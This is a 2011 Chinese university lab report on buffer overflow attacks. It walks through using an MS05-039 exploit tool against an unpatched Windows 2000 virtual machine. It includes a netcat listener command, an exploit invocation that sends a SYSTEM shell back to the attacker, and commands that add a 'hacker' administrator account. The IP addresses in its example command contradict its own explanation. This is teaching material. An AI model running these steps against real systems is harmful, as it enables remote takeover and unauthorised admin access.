计算机网络安全实验报告_第1页
计算机网络安全实验报告_第2页
计算机网络安全实验报告_第3页
计算机网络安全实验报告_第4页
计算机网络安全实验报告_第5页
全文预览已结束

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、计算机网络安全实验报告实验序号:6实验项目名称:缓冲区溢出攻击与防范实验学号姓名专业、班实验地点实1-411指导教师实验时间2011-11-15一、实验目的及要求通过实验掌握缓冲区溢出的原理;通过使用缓冲区溢出攻击软件模拟入侵远程主机;理解缓冲区溢出危险性;理解防范和避免缓冲区溢出攻击的措施。二、实验设备(环境)及要求Windows 2000 server,虚拟机.本实验需要用到虚拟机,因此每台实验主机都通过安装软件WMware Workstation分割出了虚拟机。真实主机P1的配置为:操作系统Windows 2000 server SP0或者windows XP sp2,并且安装ms05-

2、039.exe缓冲区溢出攻击软件。虚拟机P2配置为:操作系统Windows2000 Server SP0(没有另外打补丁,存在ms05039漏洞)。3)实验网络拓扑图三、实验内容与步骤缓冲区溢出攻击之所以成为一种常见的攻击手段,其原因在于缓冲区溢出漏洞太普通了,并且易于实现。而且,缓冲区溢出所以成为远程攻击的主要手段,其原因在于缓冲区溢出漏洞给予了攻击者所想要的一切:植入并且执行攻击代码。被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序,从而得到被攻击主机的控制权。 实验任务: 利用ms05-039溢出漏洞攻击MS05-039漏洞是Microsoft Windows即插即用功能远程缓冲区

3、溢出漏洞。Microsoft Windows即插即用(PnP)功能允许操作系统在安装新硬件时能够检测到这些设备。Microsoft Windows即插即用功能中存在缓冲区溢出漏洞,造成该漏洞的原因是Plug and Play 服务中有未经检查的缓冲区。成功利用这个漏洞的攻击者可以完全控制受影响的系统。这是一个严重的安全漏洞,成功的攻击者可以完全控制被攻击的计算机。这个漏洞既可以用来远程溢出(只适用于目标系统是2000和xp sp1),也可以用来本地提升权限(2000以上版本都可以)。而且溢出成功后会得到一个SYSTEM权限的shell。本实验是在主机上利用ms05039溢出工具对虚拟机上的ms

4、05039漏洞进行溢出攻击,入侵成功后获得系统的控制权。 1)入侵准备工作这是一个远程执行代码和本地特权提升漏洞。在 Windows 2000 上,匿名攻击者可能试图远程利用此漏洞。在 Windows XP Service Pack 1 上,只有经身份验证的用户可试图远程利用此漏洞。 在 Window XP Service Pack 2 和 Windows Server 2003 上,只有管理员才能远程访问受影响的组件。成功利用此漏洞的攻击者可完全控制受影响的系统。攻击者可随后安装程序,查看、更改或删除数据,或者创建拥有完全用户权限的新帐户。(1)关闭本机(攻击主机)上的杀毒软件和防火墙软件,

5、确保实验软件能够运行;(2)运行nc.exe。在本地进行监听:nc vv l p 99,如图2。图2 运行nc 进行监听2)对远程主机进ms05-039漏洞进行入侵实验在命令行下进行,具体操作如下:(1)运行ms05039scan.exe,如图3,设定探测目标172.16.167.103(实验中以实际虚拟机为准)。图3 ms05039扫描(2)点击“”按钮;(3)运行结束后查看结果,此例中表明目标主机有该漏洞,可以进行下一步攻击。3)攻击(1)在dos下运行ms05039攻击程序ms0539.exe。ms0539.exe是一个利用远程主机ms05-039漏洞进行溢出的工具,它在命令行下使用,使

6、用格式如下: ms05039.exe <host> <conIP> <conPort> target其中:host :目标主机地址conIP :回连ip地址,一般就是本地主机ip地址onPort:回连端口,如该实验中的“99”target :目标系统类型,缺省为1系统类型有两种:0:English win2k(sp4)1 :Chinese win2k (sp4)我们在命令行下输入:ms05039.exe 172.16.167.101 172.16.167.151,(这表示对172.16.167.103进行远程溢出,溢出后返回的ip是172.16.167.10

7、3,返回端口是99,远程主机的操作系统类型是Chinese win2k sp4),如图4所示 图4 执行ms05039攻击(2)检查我们刚才运行nc的dos窗口,若出现图5所示,则表明攻击成功。此dos窗口中运行的任何命令都是在目标主机上运行,相当于在目标主机本机上开一个dos窗口运行程序一样。 图5 攻击成功的结果(3)验证。运行net user hacker /add和net localgroup administrators hacker /add验证攻击者运行程序的权限,若成功则表明有超级用户权限。成功后可以在目标主机上验证是否添加了用户。四、实验结果与数据处理如以上分析结果所示。五、分析与讨论通过本次实验基本的掌握缓冲区溢出的原理,知道它是怎样进行攻击的。也能够通过使用缓冲区

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论